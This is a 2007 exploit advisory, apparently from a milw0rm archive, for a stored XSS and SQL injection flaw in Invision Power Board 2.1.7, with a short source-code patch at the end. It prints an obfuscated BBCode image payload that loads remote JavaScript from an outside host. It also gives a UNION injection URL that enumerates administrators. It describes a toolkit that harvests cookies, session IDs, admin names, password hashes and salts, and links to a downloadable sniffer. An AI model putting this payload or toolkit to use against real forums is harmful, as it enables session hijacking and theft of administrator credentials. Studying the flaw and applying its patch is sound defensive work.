Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit

                                                ----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]

						INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
							Eugene Minaev [email protected]
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
		 
		----[ NITRO ... ]
		
		This vulnerability was already found before, but there was no available 
		public "figting" exploit for it. This POC consists of several parts - active xss generator, 
		JS-file, which will be caused at visiting page with xss, log viewer and special component,
		which will take necessary data from MySQL forum's tables in case if intercepted session
		belonged to the person with moderator privileges. 
		
		----[ ANALYSIS ... ]
		
		XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for 
		future injetion on the forum board. As the reference it is necessary to specify the full way 
		up to ya.js file (in which you have already preliminary corrected way on your own). Most likely 
		it is necessary only to press the button. 
		
		[img]http://www.ya.ru/[snapback]	onerror=script=document.createElement(String.fromCharCode(115,99,114,
		105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
		head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
		style=visibility:hidden	=[/snapback].gif[/img]
		
		The injection can be executed only when there is available session of the user with access 
		in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval" 
		function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:
		
		index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
		
		----[ RECORD ... ]
		{
		
			---IP ADDRESS	sniffed ip address
			---REFERER		xssed theme
			---COOKIES 		xssed cookies of forum member
			---USER ID		xssed user id of forum member
			---ADMIN NAME	admin username
			---ADMIN PASS	admin pass hash
			---ADMIN SALT	admin hash salt
			
		}
		
		----[ PATCH ... ]
		
		FILE 
			sources/classes/bbcode/class_bbcode_core.php
		FUNCTION
			regex_check_image
		LINE
			924
		REPLACE
			if ( preg_match( "/[?&;]/", $url) )
		ON
			if ( preg_match( "/[?&;\<\[]/", $url) ) 
			
			
		FILE
			sources/classes/bbcode/class_bbcode_core.php
		FUNCTION
			post_db_parse_bbcode
		LINE
			486
		REPLACE
			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
		ON
			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );

			if ( $row['bbcode_tag'] == 'snapback' )
			{	
				$match[2][$i] = intval( $match[2][$i] );
			}  
			
			
		
		www.underwater.itdefence.ru/isniff.rar
		www.exploit-db.com/sploits/2008-isniff.rar

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
OSVDB: 51280, 51281

# milw0rm.com [2008-01-05]